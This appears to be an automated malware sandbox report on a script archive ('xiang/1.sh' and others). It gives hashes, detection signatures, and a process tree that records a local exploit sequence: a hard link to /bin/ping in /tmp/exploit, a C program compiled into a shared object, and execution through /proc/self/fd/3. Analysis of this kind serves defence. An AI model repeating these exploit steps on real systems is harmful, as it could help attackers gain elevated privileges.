Overview

overview

5

Static

static

xiang/1.sh

ubuntu-18.04-amd64

5

xiang/1.sh

debian-9-armhf

5

xiang/1.sh

debian-9-mips

5

xiang/1.sh

debian-9-mipsel

5

xiang/go.sh

windows7-x64

3

xiang/go.sh

windows10-2004-x64

3

xiang/ss

ubuntu-18.04-amd64

1

xiang/ssh-scan

ubuntu-18.04-amd64

1

Analysis

  • max time kernel
    0s
  • max time network
    102s
  • platform
    linux_amd64
  • resource
    ubuntu1804-amd64-en-20211208
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-en-20211208kernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    27-11-2022 12:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    xiang/1.sh

  • Size

    404B

  • MD5

    fa4f1798d03844cc950c5c0ff1ed71a7

  • SHA1

    7b7bb83c614603989d91a77ac0405d4000a0fa75

  • SHA256

    a5b0146024e8974f15f29c835f5d2d272a199846fa04963bb05d7e0bd14620ff

  • SHA512

    e94e75ade995e3ed08e1fcff6a830dbb28e512091d72af14bbf19ae6b6a33381130bda2c9b38050e61fc9dcf82e25ba06fb8d8f15edd4edeb1a7c1a675a8139e

Score
5/10

Malware Config

Signatures

  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 17 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/xiang/1.sh
    /tmp/xiang/1.sh
    1⤵
    • Writes file to tmp directory
    PID:593
    • /bin/rm
      rm -r -f /tmp/exploit
      2⤵
      • Writes file to tmp directory
      PID:594
    • /bin/mkdir
      mkdir /tmp/exploit
      2⤵
      • Reads runtime system information
      PID:595
    • /bin/ln
      ln /bin/ping /tmp/exploit/target
      2⤵
        PID:596
      • /bin/ls
        ls -l /proc/593/fd/3
        2⤵
        • Reads runtime system information
        PID:597
      • /bin/rm
        rm -rf /tmp/exploit
        2⤵
        • Writes file to tmp directory
        PID:598
      • /bin/ls
        ls -l /proc/593/fd/3
        2⤵
        • Reads runtime system information
        PID:599
      • /bin/cat
        cat
        2⤵
          PID:600
        • /usr/bin/gcc
          gcc -w -fPIC -shared -o /tmp/exploit program.c
          2⤵
          • Writes file to tmp directory
          PID:601
      • /usr/lib/gcc/x86_64-linux-gnu/7/cc1
        /usr/lib/gcc/x86_64-linux-gnu/7/cc1 -quiet -imultiarch x86_64-linux-gnu program.c -quiet -dumpbase program.c "-mtune=generic" "-march=x86-64" -auxbase program -w -fPIC -fstack-protector-strong -Wformat -Wformat-security -o /tmp/ccKZJpcf.s
        1⤵
        • Writes file to tmp directory
        PID:602
      • /usr/local/sbin/as
        as -W --64 -o /tmp/ccX15Hao.o /tmp/ccKZJpcf.s
        1⤵
          PID:607
        • /usr/local/bin/as
          as -W --64 -o /tmp/ccX15Hao.o /tmp/ccKZJpcf.s
          1⤵
            PID:607
          • /usr/sbin/as
            as -W --64 -o /tmp/ccX15Hao.o /tmp/ccKZJpcf.s
            1⤵
              PID:607
            • /usr/bin/as
              as -W --64 -o /tmp/ccX15Hao.o /tmp/ccKZJpcf.s
              1⤵
              • Writes file to tmp directory
              PID:607
            • /usr/lib/gcc/x86_64-linux-gnu/7/collect2
              /usr/lib/gcc/x86_64-linux-gnu/7/collect2 -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccC3E8ax.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -shared -z relro -o /tmp/exploit /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccX15Hao.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o
              1⤵
              • Writes file to tmp directory
              PID:608
            • /usr/bin/ld
              /usr/bin/ld -plugin /usr/lib/gcc/x86_64-linux-gnu/7/liblto_plugin.so "-plugin-opt=/usr/lib/gcc/x86_64-linux-gnu/7/lto-wrapper" "-plugin-opt=-fresolution=/tmp/ccC3E8ax.res" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" "-plugin-opt=-pass-through=-lc" "-plugin-opt=-pass-through=-lgcc" "-plugin-opt=-pass-through=-lgcc_s" --build-id --eh-frame-hdr -m elf_x86_64 "--hash-style=gnu" --as-needed -shared -z relro -o /tmp/exploit /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crti.o /usr/lib/gcc/x86_64-linux-gnu/7/crtbeginS.o -L/usr/lib/gcc/x86_64-linux-gnu/7 -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu -L/usr/lib/gcc/x86_64-linux-gnu/7/../../../../lib -L/lib/x86_64-linux-gnu -L/lib/../lib -L/usr/lib/x86_64-linux-gnu -L/usr/lib/../lib -L/usr/lib/gcc/x86_64-linux-gnu/7/../../.. /tmp/ccX15Hao.o -lgcc --push-state --as-needed -lgcc_s --pop-state -lc -lgcc --push-state --as-needed -lgcc_s --pop-state /usr/lib/gcc/x86_64-linux-gnu/7/crtendS.o /usr/lib/gcc/x86_64-linux-gnu/7/../../../x86_64-linux-gnu/crtn.o
              1⤵
              • Writes file to tmp directory
              PID:609
            • /proc/self/fd/3
              /proc/self/fd/3
              1⤵
                PID:593

              Network

              MITRE ATT&CK Matrix

              Replay Monitor

              Loading Replay Monitor...

              Downloads